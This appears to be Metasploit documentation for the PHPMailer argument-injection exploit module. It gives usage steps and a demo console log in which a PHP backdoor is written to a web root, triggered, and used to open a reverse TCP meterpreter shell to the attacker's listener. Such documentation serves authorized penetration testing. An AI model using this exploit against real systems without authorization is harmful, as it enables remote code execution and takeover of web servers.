adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
c48a6ddbdfc02bf92b8d4e247dbe89bdfba4e821
metasploit-gs/documentation/modules/exploit/multi/http/phpmailer_arg_injection.md
T
Spencer McIntyre 960c1a1434 Update docs to reflect the final phpmailer module
2017-01-10 17:44:22 -05:00

3.1 KiB
Raw Blame History

Vulnerable Application

PHPMailer versions up to and including 5.2.20 are affected by a vulnerability which can be leveraged by an attacker to write a file with partially controlled contents to an arbitrary location through injection of arguments that are passed to the sendmail binary. This module writes a payload to the web root of the webserver before then executing it with an HTTP request. The user running PHPMailer must have write access to the specified WEB_ROOT directory and successful exploitation can take a few minutes.

5.1.18 is also targetted.

Verification Steps

  1. Install a vulnerable PHPMailer
  2. Start msfconsole
  3. use exploit/multi/http/phpmailer_arg_injection
  4. Set the TARGETURI and WEB_ROOT options as applicable
  5. exploit
  6. Verify the module yields a PHP meterpreter session in < 5 minutes
  7. Verify the malicious PHP file was automatically removed

Scenarios

Demo taken directly from PR7768

msf (S:0 J:0) exploit(php_mailer) > options

Module options (exploit/linux/http/php_mailer):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST       192.168.90.134   yes       The target address
   RPORT       8080             yes       The target port
   SSL         false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI   /                yes       Path to the application root
   TRIGGERURI                   no        Path to the uploaded payload
   VHOST                        no        HTTP server virtual host
   WEB_ROOT    /www             yes       Path to the web root



Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.90.134   yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic



msf (S:0 J:0) exploit(php_mailer) > rexploit
[*] Reloading module...

[*] [2016.12.29-17:03:47] Started reverse TCP handler on 192.168.90.134:4444
[*] [2016.12.29-17:03:47] Writing the backdoor to /www/0IxI5AFB.php
[*] [2016.12.29-17:04:07] Sleeping before requesting the written file
[*] [2016.12.29-17:04:07] Waiting for up to 300 seconds to trigger the payload
[+] [2016.12.29-17:04:48] Successfully found the payload
[*] [2016.12.29-17:05:50] Sending stage (34122 bytes) to 172.17.0.2
[*] Meterpreter session 4 opened (192.168.90.134:4444 -> 172.17.0.2:47280) at 2016-12-29 17:05:50 -0500
[+] [2016.12.29-17:05:50] Deleted /www/0IxI5AFB.php
[+] [2016.12.29-17:06:10] Successfully triggered the payload


meterpreter > sysinfo
Computer    : 90f0c8e8dbe4
OS          : Linux 90f0c8e8dbe4 4.8.15-200.fc24.x86_64 #1 SMP Thu Dec 15 23:09:22 UTC 2016 x86_64
Meterpreter : php/linux

meterpreter >
Reference in New Issue View Git Blame Copy Permalink